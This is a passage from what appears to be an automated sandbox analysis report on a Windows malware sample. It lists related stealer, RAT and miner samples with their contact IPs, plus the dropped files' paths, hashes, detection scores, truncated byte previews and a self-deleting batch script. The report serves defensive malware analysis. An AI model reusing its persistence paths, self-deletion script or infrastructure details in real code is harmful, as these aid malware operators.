	Lisect_AVT_24003_G1A_70.exe	Get hash	malicious	LummaC, Bdaejec, LummaC Stealer	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_72.exe	Get hash	malicious	LummaC, Bdaejec, LummaC Stealer	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_5.exe	Get hash	malicious	Quasar, Bdaejec	Browse	44.221.84.105
FREE-NET-ASFREEnetEU	Lisect_AVT_24003_G1A_37.exe	Get hash	malicious	Bdaejec, RisePro Stealer	Browse	193.233.132.62
	LisectAVT_2403002A_262.exe	Get hash	malicious	RisePro Stealer	Browse	193.233.132.190
	LisectAVT_2403002A_224.exe	Get hash	malicious	RisePro Stealer	Browse	193.233.132.74
	hunta[1].exe	Get hash	malicious	Bdaejec, RisePro Stealer	Browse	193.233.132.62
	External Own 4.20.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	147.45.47.64
	Aquantia_Setup 2.11.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	147.45.47.64
	AdobeUpdaterV131.exe	Get hash	malicious	Bdaejec, RisePro Stealer	Browse	193.233.132.62
	installer.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	147.45.47.81
	92.249.48.47-skid.arm7-2024-07-20T09_04_19.elf	Get hash	malicious	Mirai, Moobot	Browse	147.45.93.156
	conhost.exe	Get hash	malicious	Xmrig	Browse	147.45.47.81

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\jHYZko.exe	Lisect_AVT_24003_G1A_84.exe	Get hash	malicious	Bdaejec	Browse
	Lisect_AVT_24003_G1A_90.exe	Get hash	malicious	Bdaejec	Browse
	Lisect_AVT_24003_G1A_35.exe	Get hash	malicious	Bdaejec	Browse
	Lisect_AVT_24003_G1A_54.exe	Get hash	malicious	Bdaejec	Browse
	Lisect_AVT_24003_G1A_55.exe	Get hash	malicious	Azorult, Bdaejec	Browse
	Lisect_AVT_24003_G1A_37.exe	Get hash	malicious	Bdaejec, RisePro Stealer	Browse
	Lisect_AVT_24003_G1A_79.exe	Get hash	malicious	Amadey, Bdaejec	Browse
	Lisect_AVT_24003_G1A_70.exe	Get hash	malicious	LummaC, Bdaejec, LummaC Stealer	Browse
	Lisect_AVT_24003_G1A_72.exe	Get hash	malicious	LummaC, Bdaejec, LummaC Stealer	Browse
	Lisect_AVT_24003_G1A_5.exe	Get hash	malicious	Quasar, Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590694334703423
Encrypted:	false
SSDEEP:	384:1F6STXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:7NQGPL4vzZq2o9W7GsxBbPr
MD5:	69203C73AC60EA5A6F79F42DE29F7273
SHA1:	258E4B0940E0C514C67B05180D756F121CC9F20B
SHA-256:	75D79A6CE821626FCE09C84A82FBFAF6F4D24CB81F7845CE16200CE439FCB9E9
SHA-512:	14FC99CA618A445899AB64C8A837AA2D2636729A872D71D45FDF37925072B500F5267BCC17FE8DDC9DC5806B50D2C14A7F9AFD2738758D1B1DF91F3882D167A1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.73134691102098
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	C8AA410F2F5F298C97D6CC544981060D
SHA1:	5410135AF2C7C2B3650D161B04A2865F3CCB7895
SHA-256:	8DF54AD279BDA82D87C827E6AD7A25CD169610FB43EFD3A0AF1DF9D8ADD498B8
SHA-512:	9D39EB684E59BE7793556955E0A100D250CDC50F24BA88D3AF7FFD0531207672714269205E6D01FA61D452A99073393AF4E7800D77C3279DE82A0379AC4C8840
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.366720516287661
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdZEQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdZXGCq2iW7z
MD5:	849E26F092DF0AD9F26E1B128938E0C0
SHA1:	B971002363FF595727D61A8CEEE2A1379DA9581C
SHA-256:	3299C7306EB547A54AA38E54F0C8C31B211B84249E45E92F0C6254B79FB158FF
SHA-512:	41B0127EBA491519F9E6D038688E3EDBF4453ACF131BEC78D01D6B42D29D0D183E95ED2156424CC2B04EDE91BB296F673C07B5AE2D77F83CDE6D0A5FD6A7D013
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MPGPH131\MPGPH131.exe

Download File

Process:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3146240
Entropy (8bit):	7.971437934868994
Encrypted:	false
SSDEEP:	49152:27lf5RZ4Q9FDCjZtjBJBMndpCqYiCZG5uvmmAwYU9fF4nbGs/cSqyVU5jX:27lf5RWxfaHCqhCZ3dAwY+fFGqnX
MD5:	EE50F2DB274C7ABDBAE3713A14020C24
SHA1:	312AF659D98D04B23C6AB5F5324604FD04A96777
SHA-256:	60285015F8B5E32F20411D30B7C64D8748827409275F5A42053B307BC2FF17DE
SHA-512:	BBACD094942F9493D58367D19BF5573331D40C7CD96A2B0D4A787DE215E9C3C509C1F2F168B2E632C55686B41AE72713ABBE9214C04C889F8D3F18ECDA9B6B11
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95% Antivirus: Virustotal, Detection: 86%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L....~.e...............".....>....................@......................................@... .. .... .. .......... .......,...x....................................................................................................................................4..................@............p......."...8..............@............@...0.......Z..............@................p.......b..............@....................d...b..............@....rsrc...............................@..@..........y.. ...(..................@....data....."......".................@...p.L~.u...P.......B..../............. ...........................................................................................................

C:\ProgramData\MPGPH131\MPGPH131.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_jHYZko.exe_d8685fa3666ef0170de53ca60392592e0c360b1_2472fd22_e3a77683-1b53-4759-a244-058d1fe851d7\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9881881703146915
Encrypted:	false
SSDEEP:	96:EiPFUbdhbrnswhna7afzQXIDcQ0c6obcE6cw3Kc+HbHg/5ksS/YyNlIcIPkMhFS4:LCfbrny0KsbAeljE/B9zuiFHZ24IO8p
MD5:	27DCC637D1828AC2E263C9E8168C4EFD
SHA1:	FADC207DBF3D8F44A0051F158150F3380332ECE5
SHA-256:	A4A5FA034484600BB29C1629E5FB2D44F31E7270C6DD90E3FCEC8F06AF6D2EBC
SHA-512:	ECA8A00ECD8C81C730B960408FD70B4AEFFC20013AD6A16AAC9D6A16FCB8044D9526A189C86F96D95D6DA5854CE0E30A07F7710DFE245D1B61AB38E6B22D1900
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.5.0.6.0.2.3.2.8.6.0.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.5.0.6.0.3.3.7.5.4.8.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.a.7.7.6.8.3.-.1.b.5.3.-.4.7.5.9.-.a.2.4.4.-.0.5.8.d.1.f.e.8.5.1.d.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.e.9.d.d.c.8.-.a.8.9.0.-.4.6.7.a.-.8.e.b.0.-.3.6.6.b.5.a.9.4.b.d.8.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.j.H.Y.Z.k.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.4.-.0.0.0.1.-.0.0.1.4.-.6.9.e.a.-.b.7.1.e.4.0.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.1.2.4.1.1.7.5.4.7.f.e.1.d.8.5.c.b.8.f.b.2.8.3.5.e.9.7.e.1.0.e.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.j.H.Y.Z.k.o...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA7B2.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jul 25 03:10:03 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	155114
Entropy (8bit):	1.8619255182314498
Encrypted:	false
SSDEEP:	384:LvFchuGcx9hnqhF+yzTkjv22wwM/ziNVuGAJuqYjSY9:Lv6YBx9mBng22SzeuGAE9jL
MD5:	363DF81334FDF238131519FAD8E97E14
SHA1:	A6A398B16889525842DF9186CAC012BA624169DF
SHA-256:	552FAEFE4E95BE25636D1DBDDF4B10338C8716F171583D08F3CFB45FD09AC961
SHA-512:	5659745B305A7E3990FEA09A75987D0036BDD98BE1D92653EA4A1B573B89FB0D3809C69CD58942B079F2A480159438BBF49C62525A5F4A1373776974D8980EEE
Malicious:	false
Preview:	MDMP..a..... .........f............D...............X.......l.... ......T...TO..........`.......8...........T............=..............h!..........T#..............................................................................eJ.......#......GenuineIntel............T.......T.....f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAADF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8302
Entropy (8bit):	3.705915368048326
Encrypted:	false
SSDEEP:	192:R6l7wVeJSQ6l6YrZ6a/HgmfmdsPpDy89bHasfNEtm:R6lXJF6l6Y16SgmfmgH5fND
MD5:	3D2DAB96C8D274A1FA0D5DA3E322F587
SHA1:	A46007F5318E2F9F70F75D636BF74E1D25688AA7
SHA-256:	A261538CD3FBCAB2B9A76CACD51CBE40ED12493CCE67A138770458DC5D4625A4
SHA-512:	8CFC5B7DBBD2ACC64B22D8E071E052C63F1AA9938487D123684E1B72062E7C29E28A452E61DD1004F59CA555E85FF7809831463659E45DBDA7EAA2E37111D72E
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB0F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.4592509719173545
Encrypted:	false
SSDEEP:	48:cvIwWl8zsyJg77aI9X8WpW8VYdYm8M4JqEClaFHb+q8hUv+1lDgUed:uIjfAI7l17V5JqEM4b6UG3gUed
MD5:	D0FECC6DE006DC5E33A7FE9C6B295A00
SHA1:	9D4BC5DA1EB7BD94121475D47CA4045D7170F63A
SHA-256:	D83536E95387BF09723AA1423559E8F1EB871A4D1D3B89287D93F39FC2B56614
SHA-512:	FA8F778C18C87A42C00B574BC2C3DFA40C81AC885DCDE4D7BCFD90FA8E2FE224A15513776DBDEB6359F2043ACAB83358E085518B51B38A02A5E41FC046F69C44
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425892" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k2[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k2[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k3[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k3[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k4[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k5[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\RageMP131\RageMP131.exe

Download File

Process:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3146240
Entropy (8bit):	7.971437934868994
Encrypted:	false
SSDEEP:	49152:27lf5RZ4Q9FDCjZtjBJBMndpCqYiCZG5uvmmAwYU9fF4nbGs/cSqyVU5jX:27lf5RWxfaHCqhCZ3dAwY+fFGqnX
MD5:	EE50F2DB274C7ABDBAE3713A14020C24
SHA1:	312AF659D98D04B23C6AB5F5324604FD04A96777
SHA-256:	60285015F8B5E32F20411D30B7C64D8748827409275F5A42053B307BC2FF17DE
SHA-512:	BBACD094942F9493D58367D19BF5573331D40C7CD96A2B0D4A787DE215E9C3C509C1F2F168B2E632C55686B41AE72713ABBE9214C04C889F8D3F18ECDA9B6B11
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95% Antivirus: Virustotal, Detection: 86%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L....~.e...............".....>....................@......................................@... .. .... .. .......... .......,...x....................................................................................................................................4..................@............p......."...8..............@............@...0.......Z..............@................p.......b..............@....................d...b..............@....rsrc...............................@..@..........y.. ...(..................@....data....."......".................@...p.L~.u...P.......B..../............. ...........................................................................................................

C:\Users\user\AppData\Local\RageMP131\RageMP131.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\1E3A2110.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\2b7051ed.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	5.005965739271022
Encrypted:	false
SSDEEP:	3:jdKZOUkh4E2J5xAI6dkASMD2UUkh4E2J5xAI6dkAYKReJsjIdKZOUkh4E2J5xAIb:jdKo923faYMD2U923fa2/dKo923fa8jn
MD5:	B6696B3AE187AFE7E400746B1EA761B5
SHA1:	FB4256AA6CF8B8CD5570BFAD11C776DE200AB7DB
SHA-256:	11102E7FA95D24BB55FF79FB0BFB09B522BFFAD2E7D406108FB309340C36BD18
SHA-512:	F5C2F556BC9C58663AABAD4323A4EA2F60646FD01F414189C41272F71592200A4E66C08BA45D26279CD39DBF75485547305E47382F969B3FF0AA86A766A6FC56
Malicious:	false
Preview:	:DELFILE..del "C:\Users\user\AppData\Local\Temp\jHYZko.exe"..if exist "C:\Users\user\AppData\Local\Temp\jHYZko.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\2b7051ed.bat"..

C:\Users\user\AppData\Local\Temp\3EFE34B7.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\412E45BE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\459048D5.exe

Download File

